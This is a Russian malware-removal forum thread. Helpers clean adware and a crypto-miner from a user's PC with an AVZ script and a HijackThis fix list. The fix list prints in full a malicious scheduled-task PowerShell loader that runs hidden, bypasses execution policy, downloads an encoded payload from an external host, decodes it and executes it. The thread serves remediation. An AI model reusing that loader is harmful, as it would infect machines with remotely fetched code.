Показано с 1 по 6 из 6.

Выскакивает и пропадает окно cmd.exe [not-a-virus:HEUR:AdWare.Win32.Generic, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen ] (заявка № 217016)

  1. #1
    Junior Member Репутация
    Регистрация
    05.01.2018
    Сообщений
    2
    Вес репутации
    29

    Выскакивает и пропадает окно cmd.exe [not-a-virus:HEUR:AdWare.Win32.Generic, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen ]

    Добрый день!
    Начала самопроизвольно выскакивать командная строка и быстро пропадать. При этом каждый раз создает в папке "Temp" новую папку с примерным названием "B15A7EBA-6940BB12-EEDB27B4-798C0003", в которой находиться файл "nsetup.exe".
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Salex m, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Выполните скрипт в AVZ:
    Код:
    begin
     TerminateProcessByName('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe');
     QuarantineFile('C:\PROGRA~3\9e30f7d2\aefeb61f.dll', '');
     QuarantineFile('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe', '');
     QuarantineFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1', '');
     QuarantineFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1.', '');
     QuarantineFile('C:\Users\Pavilion\AppData\Roaming\mysites123\UninstallManager.exe', '');
     QuarantineFile('C:\Windows\SysWOW64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1."', '');
     QuarantineFile('dnslockington.exe', '');
     DeleteFile('C:\PROGRA~3\9e30f7d2\aefeb61f.dll', '32');
     DeleteFile('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}\cd6db7a8-7ac6-0003-2afa-4a8f7e5c3d36.exe', '32');
     DeleteFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1', '32');
     DeleteFile('C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1.', '32');
     DeleteFile('C:\Users\Pavilion\AppData\Roaming\mysites123\UninstallManager.exe', '32');
     DeleteFile('C:\Windows\system32\regsvr32.exe  /s /n /i:"/rt" "C:\PROGRA~3\9e30f7d2\aefeb61f.dll"', '32');
     DeleteFile('C:\Windows\SysWOW64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "C:\Users\Pavilion\AppData\Local\A5EAA1~1\{AEFEB~1."', '32');
     DeleteFile('dnslockington.exe', '32');
     ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "{0B7D7947-090F-7D05-7F11-0C09790D117A}" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "{BBAEAC99-0C05-1B32-966C-6C50B0310937}" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "{DA689782-F597-66D5-21B2-DEA8DD8A6551}" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "{E34BF322-EAB2-49B6-B653-E275DD44A137}" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "{EA7359AC-05E1-F7B9-CBCE-E42B1A50511C}" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "BA12CDE0-EA73-7EBC-202E-E46A43CD6E60" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "DNSLOCKINGTON" /F', 0, 15000, true);
     DeleteFileMask('c:\progra~3\9e30f7d2', '*', true);
     DeleteFileMask('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}', '*', true);
     DeleteFileMask('c:\users\pavilion\appdata\local\a5eaa1~1', '*', true);
     DeleteFileMask('c:\users\pavilion\appdata\roaming\mysites123', '*', true);
     DeleteFileMask('c:\windows\system32\regsvr32.exe  /s /n /i:"/rt" "c:\progra~3\9e30f7d2', '*', true);
     DeleteFileMask('c:\windows\syswow64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "c:\users\pavilion\appdata\local\a5eaa1~1', '*', true);
     DeleteDirectory('c:\progra~3\9e30f7d2');
     DeleteDirectory('c:\programdata\{e85d2c27-5ff6-9b8c-4c0b-6347316e8219}');
     DeleteDirectory('c:\users\pavilion\appdata\local\a5eaa1~1');
     DeleteDirectory('c:\users\pavilion\appdata\roaming\mysites123');
     DeleteDirectory('c:\windows\system32\regsvr32.exe  /s /n /i:"/rt" "c:\progra~3\9e30f7d2');
     DeleteDirectory('c:\windows\syswow64\regsvr32.exe  /n /s /i:"/259aa228f4028ed7 /q" "c:\users\pavilion\appdata\local\a5eaa1~1');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteRepair(1);
     ExecuteRepair(21);
     ExecuteWizard('SCU', 2, 2, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    Сделайте новый лог Autologger.

    Сделайте лог Malwarebytes AdwCleaner.
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    05.01.2018
    Сообщений
    2
    Вес репутации
    29
    Выполнил. Извиняюсь, что задержался. Проблема еще актуальна.
    В какой-то период пропадала.
    Плюс появилась проблема "выскакивания новой посторонней вкладки на каждый клик в браузере".
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Удалите всё найденное в AdwCleaner, дождитесь окончания удаления и перезагрузите систему по требованию программы.
    После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C1].txt, прикрепите к своему следующему сообщению.

    Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)) и пофиксите всё, что есть из списка:
    Код:
    R0 - HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command,(default) = C:\Program Files\Internet Explorer\iexplore.exe http://www.mysites123.com/?type=sc&ts=1449580358&z=aced479f086058457743efcg5z6zet2w0b1eec9wcb&from=amt&uid=TOSHIBAXMK6476GSX_X17VT646TXXX17VT646T
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    O4-32 - HKLM\..\Run: [tim] c:\users\pavilion\appdata\roaming\tim  (file missing)
    O17 - HKLM\System\CCS\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.142.178
    O17 - HKLM\System\CCS\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.143.176
    O17 - HKLM\System\CCS\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.142.178
    O17 - HKLM\System\CCS\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.143.176
    O17 - HKLM\System\CCS\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.142.178
    O17 - HKLM\System\CCS\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.143.176
    O17 - HKLM\System\CCS\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.142.178
    O17 - HKLM\System\CCS\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.143.176
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 82.163.143.176 82.163.142.178
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.142.178
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{08552722-B735-455B-9BB4-4701C6D6E5ED}: NameServer = 82.163.143.176
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.142.178
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{40362522-DC6E-4760-A496-235E64A0DD04}: NameServer = 82.163.143.176
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.142.178
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9FE84881-4E6D-492D-AE78-B2F955ECBDEA}: NameServer = 82.163.143.176
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.142.178
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{F197600D-E281-4F31-B90A-AE5446803A52}: NameServer = 82.163.143.176
    O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: NameServer = 82.163.143.176 82.163.142.178
    O22 - Task: {0B7D7947-090F-7D05-7F11-0C09790D117A} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand     ; ;       ;   ;   ;         ;     ;   ; ; $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   X C L V T V U W V A ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h {   } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; ; } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { ; } 
 } 
 } X C L V T V U W V A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; X C L V T V U W V A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; X C L V T V U W V A ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / f l i p a r r a y . i n f o / u / ? a = d y L 5 K - y L G m q p j 5 m t Y D K 0 C 1 I E z 7 V K y B T n 0 A x X x B f 9 T r M I x h r U d e B K M t a p j 8 B A h 6 _ H 2 K W T e z G z l o Q j 7 W M u z 2 p 4 p b v T 1 r v u S h 1 o c y l N F G N c k Z t O l j k T 4 D d l B 0 i C 0 O Z v d L Z Z b w 4 r a P Z 7 S U 8 6 W J h G j K m 7 m G i 9 6 j h g 7 6 G X E z k Z i K P D C s I 5 y K 2 n 4 p N E V Y b s - e 7 i o h 0 4 H 1 y w o p L 5 E z a i 1 r f w H D R O M D t 1 N A V b f i R M F v 0 i G 1 d 0 L h H a z b 9 m Y s d 3 B B H P Y _ x j v 7 e k h 6 S D z i S - y 5 T E K a X Q 8 L F x i k U I 8 f W V x t X n 6 F W 7 F b s J Q 1 N R 3 i 6 Z e h r b C j v u m j E L O X G M 8 - 3 D U v M H Y O U T _ K f i A 9 R 8 J h 8 M k D C Y w A F Z D 5 S v _ 4 a K b S C 1 K 9 u w Z 5 v C w C p 9 C s - k C z I o u h h H Z S x h 3 8 V E M n M S k C u 0 Q I z y W x g k w I L 4 I g r D O S _ Z - v x X - 6 5 j U J J D A J u P k A p e e m a m l s I t s B x F y p l 2 p 5 r B f n n P x B A k z W i e 1 d P o O U 4 a _ u a P M 1 j s t j g r 6 R K 9 m m q t x o S t 0 o h 0 S w R I a F 8 O f 7 9 R x y m 6 5 s 0 j L w G S O H Y I 7 e o r o A L h o j N R f M v E M v I s I 0 N 8 V s d A s A h u 3 K e h y a v t Q 0 l T c K 3 E 3 I d g B _ F 4 C b p o 3 V f l X C 8 z m S B C V M B X n j 9 d H Q E 8 6 z R A h t 2 P 4 p j a K C H W Q f k d F 0 R b B u T A u F e D X F Y K w Z 6 d u J F n T 6 y a F f f f o r Q 1 2 9 m y s 7 M 0 o _ 6 b N 2 t M Z g F 9 c 1 y D W t m n 1 X _ Y V s O U - i z m - - u I e I x 0 6 u 6 g t W i s h _ h g 6 P 2 5 J W P L N r Q 2 p 7 Z V p s D p a S - o F A R 5 D e 3 A N F 9 d q W b I U Z R r T 8 M 8 O Q l t d 5 I - R m Q 4 m l r P i o _ T 9 y I c A q f I I Q d P H E r R h S t a D F M H m R B J V j D e B U H u v 8 e 1 W S k X l D - A 6 q c d 8 G 9 X w Z H u V r 8 t h 5 p 6 H 0 6 i O U d 8 4 k g Z l c T u T y - c X F a T i s z S O K 9 3 q g t l p z l I - 7 p m M B 9 C V N a u q U g 3 I Z 1 7 t G L l w p 3 - j M W E X j A P e Q n M B z 7 z 3 0 H 7 Y H Z R E z v u x l g F N h s I r n o t l R & c = i m L i T y V 7 3 w a A 7 Z I Q O Q P C h M H y a y k t y B e q S L _ - y v C q t 9 X 5 h z A c A P C W i e B g s x B e o f 8 N T 9 9 0 d Z m m e v n I O Z B 1 M n F S 3 N B j U R 4 1 F D a w k x 2 e W t U w c A E O J 1 Q V A B K E M b q X x - A c B 5 F h 7 a - n P h C q 4 f W G J 8 q k X a k B k z F 5 8 f x H Y s Q 6 u e H r m B E F V _ e b N C H 5 r f J G t u 6 w Z r 5 V Z 6 N i n F Z D y p J r z S 8 j k D W - Y j g u o V J K k X Z X N 6 4 r 4 f A K n 3 s D C X p s r A w 4 T o w 2 s K J 9 h i G J m Z - I 9 u 4 l I J I N K o m O W u g t l d c S T O X n s j H g W 9 t C W G S 8 8 K I 9 M J 5 m g U j m P 4 j _ e f y F I r f U C e s 5 y T V g M 8 3 h e y 4 f A a s w K O k 8 4 M 6 H I e J Q C o 3 3 O _ M B 0 W 6 o v v T k 7 l 5 j T 7 7 r 2 k o 4 4 r o T 4 k R R 5 Y D V g I l I 3 5 X f m E B s 9 8 m m 8 B g 2 K o q z V s L b R N F i s H u q V D l j b E h C - 4 T 9 7 A g f t k T j 2 5 R s 1 Y 3 L m I c m 2 A u N _ 9 p 6 b K O D Q E u c 5 P 9 s o w P - 7 s F e X A R s f B E 8 U Y d 6 - 1 2 f h l I u B 4 a W t z w D A t b A 6 2 k Q e 9 Q j Z 4 k R U O Y - R u n L Y d 1 7 a R Q j J Y - R J 9 - 3 q V o t e E c t F w Y y T 9 g 8 5 6 8 o b O X L R x 3 B e h m z O U D S K k n r S z 1 P a 6 u F p R 4 Y A P 9 P n V h V L M H Y - O U g h T S 4 d 9 M I f Y c 4 z D H S W M 7 y I m Z D 1 p w b d j G V A A t t U 4 v a C q n m v 9 T P D x Q M S U O Q w D 4 m 2 0 4 g b 8 _ I f 0 6 4 X T Z V W I X g X _ M B A n I _ 2 F M t Z w v A i 7 T - T S d h d f o z 9 E H y 6 m b s k o P W n z B X L R i A y a X q S M c 2 m - s o l 0 p m o M C o 5 W A z W P 5 T d O I 8 z z U k a U A F 5 S 4 3 w L 1 r 8 9 D E u C I l h m - 0 m A K a p e 4 a 2 m D Q f 4 0 B k - D C H d W & r = 1 2 7 9 9 0 0 8 8 3 3 2 4 4 9 2 4 0 5 " ; $ s t s k = " { 0 B 7 D 7 9 4 7 - 0 9 0 F - 7 D 0 5 - 7 F 1 1 - 0 C 0 9 7 9 0 D 1 1 7 A } " ; $ p r i d = " f l o a t i n g " ; $ i n i d = " Z Q Y R W Y Z N " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ;   } ; } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; 
 } 
 f u n c t i o n   A H A G D U O B ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; } 
 f u n c t i o n   D A R F C ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ;   } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; ; } 
 $ s c = D A R F C ( A H A G D U O B ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { ; } ; e x i t   0 ; 
    O22 - Task: {EA7359AC-05E1-F7B9-CBCE-E42B1A50511C} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\9e30f7d2\aefeb61f.dll"
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  7. #6
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    983

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 3
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\progra~3\9e30f7d2\aefeb61f.dll - not-a-virus:HEUR:AdWare.Win32.Generic
      2. c:\users\pavilion\appdata\local\a5eaa1~1\{aefeb~1 - not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
      3. c:\users\pavilion\appdata\local\a5eaa1~1\{aefeb~1. - not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen


  • Уважаемый(ая) Salex m, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Выскакивает окно cmd.exe
      От Александр Коробков в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 20.06.2017, 14:28
    2. Ответов: 4
      Последнее сообщение: 27.06.2016, 17:22
    3. Ответов: 2
      Последнее сообщение: 01.03.2015, 00:58
    4. Выскакивает окно
      От Оксана_1987 в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 05.09.2013, 21:21
    5. Ответов: 1
      Последнее сообщение: 26.01.2008, 23:07

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00784 seconds with 19 queries